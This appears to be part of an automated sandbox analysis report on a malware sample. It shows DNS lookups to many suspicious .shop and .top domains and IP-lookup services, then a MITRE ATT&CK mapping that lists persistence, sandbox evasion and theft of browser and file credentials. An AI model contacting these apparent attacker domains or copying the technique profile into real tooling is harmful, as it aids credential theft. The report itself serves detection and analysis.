DNS Response

104.21.38.33

172.67.218.77

DNS Request

tenntysjuxmz.shop

DNS Request

tenntysjuxmz.shop
8.8.8.8:53

117.113.215.185.in-addr.arpa

dns

629 B
1.2kB
9
9

DNS Request

117.113.215.185.in-addr.arpa

DNS Request

26.113.215.185.in-addr.arpa

DNS Request

ctldl.windowsupdate.com

DNS Response

199.232.210.172

199.232.214.172

DNS Request

53.107.216.95.in-addr.arpa

DNS Request

158.233.202.91.in-addr.arpa

DNS Request

20.143.216.95.in-addr.arpa

DNS Request

conditionprovice.pro

DNS Response

81.19.139.138

DNS Request

preachstrwnwjw.shop

DNS Request

preachstrwnwjw.shop
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

1.5kB
2.8kB
22
22

DNS Request

172.210.232.199.in-addr.arpa

DNS Request

fivevd5sr.top

DNS Response

188.225.44.114

DNS Request

67.113.215.185.in-addr.arpa

DNS Request

93.62.133.62.in-addr.arpa

DNS Request

complainnykso.shop

DNS Response

172.67.151.164

104.21.48.131

DNS Request

19.113.215.185.in-addr.arpa

DNS Request

charistmatwio.shop

DNS Response

172.67.193.197

104.21.90.30

DNS Request

grassemenwji.shop

DNS Response

104.21.48.158

172.67.154.82

DNS Request

158.48.21.104.in-addr.arpa

DNS Request

150.26.21.104.in-addr.arpa

DNS Request

230.13.133.195.in-addr.arpa

DNS Request

thizx13vt.top

DNS Request

thizx13vt.top

DNS Request

ocsp.comodoca.com

DNS Response

104.18.38.233

172.64.149.23

DNS Request

136.132.29.66.in-addr.arpa

DNS Request

thizx13vt.top

DNS Request

ipinfo.io

DNS Response

34.117.59.81

DNS Request

77.16.231.173.in-addr.arpa

DNS Request

thizx13vt.top

DNS Request

ctldl.windowsupdate.com

DNS Response

2.22.144.73

2.22.144.81

DNS Request

thizx13vt.top

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

197.193.67.172.in-addr.arpa

dns

1.1kB
2.1kB
17
17

DNS Request

197.193.67.172.in-addr.arpa

DNS Request

stitchmiscpaew.shop

DNS Response

104.21.26.150

172.67.136.135

DNS Request

steamcommunity.com

DNS Response

23.214.143.155

DNS Request

33.38.21.104.in-addr.arpa

DNS Request

sevtv17pn.top

DNS Response

195.133.13.230

DNS Request

227.188.43.179.in-addr.arpa

DNS Request

CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN

DNS Request

haggaifashion.com

DNS Response

66.29.132.136

DNS Request

ocsp.usertrust.com

DNS Response

172.64.149.23

104.18.38.233

DNS Request

42.56.20.217.in-addr.arpa

DNS Request

thizx13vt.top

DNS Request

135.200.91.45.in-addr.arpa

DNS Request

11.227.111.52.in-addr.arpa

DNS Request

thizx13vt.top

DNS Request

thizx13vt.top

DNS Request

thizx13vt.top

DNS Request

9.179.89.13.in-addr.arpa
8.8.8.8:53

235.4.20.104.in-addr.arpa

dns

197 B
253 B
3
2

DNS Request

235.4.20.104.in-addr.arpa

DNS Request

ignoracndwko.shop

DNS Request

ignoracndwko.shop
8.8.8.8:53

155.143.214.23.in-addr.arpa

dns

993 B
2.2kB
15
15

DNS Request

155.143.214.23.in-addr.arpa

DNS Request

240902175059845.std.kqve01.top

DNS Response

179.43.188.227

DNS Request

147.149.200.45.in-addr.arpa

DNS Request

48.231.66.45.in-addr.arpa

DNS Request

ctldl.windowsupdate.com

DNS Response

217.20.56.42

217.20.56.37

217.20.56.34

217.20.56.43

217.20.56.45

217.20.56.36

217.20.56.44

217.20.56.35

DNS Request

ocsp.sectigo.com

DNS Response

172.64.149.23

104.18.38.233

DNS Request

233.38.18.104.in-addr.arpa

DNS Request

thizx13vt.top

DNS Request

thizx13vt.top

DNS Request

nexusrules.officeapps.live.com

DNS Response

52.111.227.11

DNS Request

thizx13vt.top

DNS Request

thizx13vt.top

DNS Request

thizx13vt.top

DNS Request

ocsp.digicert.com

DNS Request

ocsp.digicert.com

DNS Response

192.229.221.95

DNS Response

192.229.221.95
8.8.8.8:53

23.149.64.172.in-addr.arpa

dns

477 B
892 B
7
7

DNS Request

23.149.64.172.in-addr.arpa

DNS Request

transfer.adminforge.de

DNS Response

176.9.8.206

DNS Request

api64.ipify.org

DNS Response

173.231.16.77

104.237.62.213

DNS Request

81.59.117.34.in-addr.arpa

DNS Request

thizx13vt.top

DNS Request

73.144.22.2.in-addr.arpa

DNS Request

self.events.data.microsoft.com

DNS Response

13.89.179.9

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion